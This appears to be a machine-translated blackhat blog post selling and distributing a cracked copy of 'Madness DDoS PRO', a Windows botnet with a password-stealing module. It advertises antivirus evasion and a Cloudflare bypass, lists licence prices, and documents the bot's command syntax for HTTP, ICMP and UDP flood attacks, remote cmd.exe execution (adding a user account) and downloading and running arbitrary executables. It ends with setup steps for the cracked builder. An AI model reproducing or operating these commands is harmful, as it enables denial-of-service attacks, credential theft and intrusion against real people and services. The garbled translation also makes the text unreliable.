- Written in c + +, easily crypt is lightweight (compressed sample <15kb font="" nbsp="">
- Full compatibility with all windows family (x86 and x64)
- Bot has 7 types of attacks
- Extremely stable system. Load on CPU and ram is very powerful.
- does not attract attention to UAC Windows Firewall
- can install port, referal and cookies individually for each attack
- Supports up to 10 targets simultaneously
- has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads
- it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.)
- has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors.
- in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple.
- support and slow get slow post! mode
- indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server.
- Bot protection of panel.
- PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014).
price $150 for base licence, $250 for lite licence, free for full.
Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases.
Attack modes and commands:
As the system is a professional syntax with commands, this seems complicated, but only at first glance =)
• dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = http://ya.ru cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2
• dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script
• dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php
• dd4 attack http post method using the system library wininet. the same as dd3, only post. Example:
DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh
• dd5 icmp attack (pings). supports up to 10 targets. Example dd5 =;
• dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = @ @ @ flud_text
• dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
• cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = http://site.ru/index.php, then (after fifteen minutes) cfa = http://site.ru/index.php
• cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
• exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe
Control Panel:
We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it!
how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power.
- Test License $0 (only for checking the forums and testers. updates not provided)
- Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100)
- Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later)
- full license $950 (all updates Rebuild and modules are free)
1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222)
2) Open the builder (do not open "madnesscracked.exe)
3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php
4) Click Update URL, it will not give you any messagebox when you click it but it should now be ready to use.
5) Your file is madnesscracked.exe (after you update url)
Credit: 0x22
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Madness DDoS PRO 1.31 (password module incl.) | Blackhattrick Blog
Reviewed by BlackHat
12:23 AM